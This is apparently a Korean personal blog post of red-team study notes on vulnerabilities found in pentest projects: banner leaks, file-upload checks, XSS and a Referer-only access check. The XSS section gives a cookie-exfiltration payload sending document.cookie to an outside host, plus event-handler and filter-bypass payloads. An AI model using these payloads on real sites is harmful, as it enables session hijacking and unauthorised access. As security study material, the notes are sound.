wonder

정보보안 스터디 - 31주차 1일 - 프로젝트 눈여겨봐야할 취약점 디테일 본문

Red Team/프로젝트 관련

정보보안 스터디 - 31주차 1일 - 프로젝트 눈여겨봐야할 취약점 디테일

wonder12 2023. 5. 12. 06:43

실제 프로젝트 눈여겨봐야할 취약점 디테일 

 

☞ 정보 누출

ASPNETMVC 5.2

ASPNET 4.0

Microsoft-HTTPAPI/2.0은 FastCGI가 실행될 때, IIS에서 버퍼오버플로우를 발생시킬 수 있습니다.

 

awselb/2.0(elastic load balancer) - 로드 밸런서입니다..

 

 

admin 페이지 접속했을 시 403 forbidden으로 하면 엄연히 따지면 여기에 중요한 게 있다는 의미라 단서가 될 수 있지만

사실 그렇게 체크리스트 잡을 정도로 위험하다고 볼 수는 없습니다.

 

 

 

 파일업로드

파일업로드에서 잘된 곳도 있지만, 로직을 놓치고 안 구현해놓은 경우가 있으므로 눈여겨봅니다.

파일이름을 랜덤으로 해서 overriding못하게 한건 잘했지만 경로를 노출해놓은 곳도 있습니다.

 

화이트리스트 필터링하는 곳에서 . 확장자로 업로드가 가능했지만 시그니처따라가는 듯합니다.(ETag: W/"~"가 나옴) PNG 등 , 따라서 jsp파일은 시그니처가 없어서 못넣으며 exe파일은 가능할 듯합니다. 

 

 

 XSS

json 방식으로 하는 게 XSS 스크립트 실행이 안되고 더 보안적으로 좋은 방법인 듯한데 밖에넣건 안에넣건 scrpt (html 태그)도 실행안되는 게 애매합니다.

 

그래도 그중에서도 어디 페이지를 클릭해서 그것을 통해서 script실행되는 게 있으니 json이라면 응답에서 거의 다 넣어보고 실험해보는 것이 좋습니다.

 

응답패킷에 http only 처리

alert(document.cookie)는 빈칸으로 나오며 TRACE 메소드도 요즘 왠만한 브라우저에서 막아놔서 XST는 어렵습니다.

사실 documet.cookie 자체는 괜찮아서 location.href='http://site.com?'+document.cookie 는 먹힙니다. 따라서 취약합니다.

 

<input onmouseover=alert(1)> type, value, 닫는 태그 없어도 기본으로 됩니다.

onclick 대신 @click도 가능합니다.

 

 인증인가

주소창으로 페이지를 들어갔을 때 못들어가서 세션 점검을 하는듯싶었지만, 

로그인 한 사람도 안되길래

레퍼럴 검증이였습니다. > 해당 주소만 변조하면 됩니다.

 

 general

html대신 do로 json대신 api 등으로 변경할 수 있습니다.

 

 

 

 

 

Comments